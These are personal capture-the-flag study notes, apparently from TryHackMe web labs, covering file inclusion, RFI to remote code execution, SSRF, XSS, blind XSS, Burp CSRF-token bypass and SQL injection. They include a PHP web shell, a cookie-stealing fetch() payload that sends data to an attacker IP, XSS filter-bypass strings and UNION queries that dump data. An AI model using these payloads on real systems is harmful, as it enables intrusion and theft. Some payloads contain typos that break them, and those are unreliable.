---
# System prepended metadata

title: web vulnerable
tags: [xss, blind, token bypass, burp suite, meowhecker, web, tryhackme]

---

# web vulnerable

[TOC]

###### tags: `tryhackme` `web`


# File Inclusion




![](https://i.imgur.com/VBoA7yl.png)


Tempering cookie ->admin 

```
curl 'http://10.10.188.128/challenges/chall2.php?file=/etc/flag2' -H 'Cookie: THM=admins'

```


![](https://i.imgur.com/g4e8Ba9.png)

It's specify the directory, here i try to use path traversal technology to by pass it 


![](https://i.imgur.com/ZKVwoTD.png)


Cookie: THM=../../../../etc/flag2%00

![](https://i.imgur.com/0D2Da8w.png)




## Capture Flag3 at /etc/flag3


get request -> slash will be delete by the script.

->post request

![](https://i.imgur.com/8WC9Vt9.png)



---

Gain RCE in **Lab #Playground** /playground.php with RFI to execute the hostname command. What is the output?

## python3 -m http.server

```
<?php echo exec('hostname');?>
```

![](https://i.imgur.com/VHWuGEE.png)

![](https://i.imgur.com/QDaGzEC.png)


![](https://i.imgur.com/ktyTjpw.png)

```
<?php print exec($_REQUEST["cmd"]); ?>
```

```
http://10.10.82.106/playground.php?file=http://10.10.23.100:8000/webshell.php&&cmd=etc /proc/version
```

# SSRF 

## What is the flag from the /private directory?


## InFo 

1
**/private**, which gives us an error message explaining that the contents cannot be viewed from our IP address.


2
**/customers/new-account-page** with a new feature allowing customers to choose an avatar for their account.



step 1  create a account to login and view [https://10-10-135-212.p.thmlabs.com/customers/new-account-page](https://10-10-135-212.p.thmlabs.com/customers/new-account-page)



Ctrl+shift+c 

![](https://i.imgur.com/TzRDMrr.png)


![](https://i.imgur.com/Q2tzA3z.png)


Choose one of the avatars and then click the **Update Avatar** button


![](https://i.imgur.com/V0ZR5UO.png)



Try to use the SSRF vulnerability to request  /private  page 

![](https://i.imgur.com/nA2LJBT.png)


Result

![](https://i.imgur.com/lJaiMfF.png)


Here, probably having a rule prevent our request forgery.



## By Pass 

We use the path traversal trick


value='meowhecker/../private'


![](https://i.imgur.com/yNs1yit.png)

[https://www.asciitohex.com/](https://www.asciitohex.com/)

THM{YOU_WORKED_OUT_THE_SSRF}


# Xss payload


Level 1 
## Proof
```
<script>alert(document.cookie)</script>
```


## Level 2

```
"><svg onload=alert("doucment.cookie")<!--
```


## Level 3 

```
</textarea><svg onlaod=alert("doucment.cookie")>
```


## Level 4 





```
';alert('doucment.cookie')//
```



![](https://i.imgur.com/XzFGD8t.png)

## Level 5

### Methods 1


```
<svg onload=alert('doucment.cookie')>
```
![](https://i.imgur.com/2nrrs06.png)


### Methods 2

```
<sscriptcript>alert('doucment.cookie')</sscriptcript> 
```

Level 6


```
meow" onerror="alert('THM')
```

**THM{XSS_MASTER}**


## By Pass 


```
jaVasCript:/*-/*`/*\\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert('THM')//>\\x3e
```

他們可能會使用各種工具來生成這段代碼



`javascript:`是一種用於在網頁中嵌入JavaScript代碼的方法

---

# Xss Blind

###### tags: `meowhecker` `xss` `blind` `tryhackme`



Click on the **Customers** tab on the top navigation bar and click the "**Signup here**" link to create an account. Once your account gets set up, click the **Support Tickets** tab, which is the feature we will investigate for weaknesses.


![](https://i.imgur.com/4xMy6ug.png)


```
meow</textarea><svg onload=alert(document.cookie)>
```



Hacker Server

```
nc -nlvp 6699
```


-n Don't do dns resolve 
-l listen 
-v verbose
-p specify port 





Attack payload 



```
</textarea><svg onload=fetch('http://10.10.164.43:6699?cookie='+btoa(document.cookie))></svg><!--
```
# Burp suite
## CSRF token bypass 

###### tags: `meowhecker` `burp suite` `token bypass`


需要再練習

## Target 
http://10.10.56.212/admin/login/

![](https://i.imgur.com/ogmBXiM.png)


### Response 


![](https://i.imgur.com/sFTppbb.png)


![](https://i.imgur.com/sa1hDTz.png)


---

Intruder 

username ->wordlist 
password ->wordlist

loginToken->macro
session->macro


## Login token(key and without the account and password) 

![](https://i.imgur.com/L7HjOD2.png)




![](https://i.imgur.com/zkLlaQM.png)


## Build a macro.

Macros是在資訊安全領域中一種指令的集合。通常用於應用程式或電腦系統中，用來自動化重複的任務或操作。在資訊安全領域中，Macros通常用來檢查系統是否安全，或者自動化防禦攻擊。


Macros allow us to perform the same set of actions repeatedly. In this case, we simply want to send a GET request to `/admin/login/`.

"Project Options" -> "Sessions" 

![](https://i.imgur.com/x5VupXH.png)

---

![](https://i.imgur.com/6ypWsMb.png)

---

![](https://i.imgur.com/nDf74yB.png)


---

![](https://i.imgur.com/TgId1Ec.png)

---

![](https://i.imgur.com/QXDQAoY.png)


---

![](https://i.imgur.com/9OWJqs2.png)


macro will now overwrite all of the parameters in our Intruder requests before we send

---

![](https://i.imgur.com/cLbPA4x.png)


Now we have a macro defined that will substitute in the CSRF token and session cookie.


![](https://i.imgur.com/vK3ziY3.png)

![](https://i.imgur.com/TXOybQs.png)


# SQLi with Repeater


###### tags: `tryhackme` `web`


## Proof
```
http://10.10.238.248/about/1'
```
![](https://i.imgur.com/deK4Yx1.png)


## Proxy -> Repeater 


ctrl + R 
ctrl + shift + R



```
1 or 1=1
```
![](https://i.imgur.com/tByL2aq.png)




## Built a payload 

```
1 union select null,null,null,null,null
```



### Find the column Name  

```
GET /about/-1 union select "meowhecker",column_name,null,null,null from information_schema.columns where table_name="people"
```

![](https://i.imgur.com/TiPJVz5.png)



---
### Enumerate all column 
```
GET /about/-1 union select "meowhecker",group_concat(column_name),null,null,null from information_schema.columns where table_name="people"
```

![](https://i.imgur.com/ZmlkYqw.png)


column 
```
id,firstName,lastName,pfpLink,role,shortRole,bio,notes
```


Retrieve Data

```
GET /about/-1 union select null,null,null,null,concat(id,firstName,lastName,pfpLink,role,shortRole,bio,notes) from people 
```
![](https://i.imgur.com/TRMvqvM.png)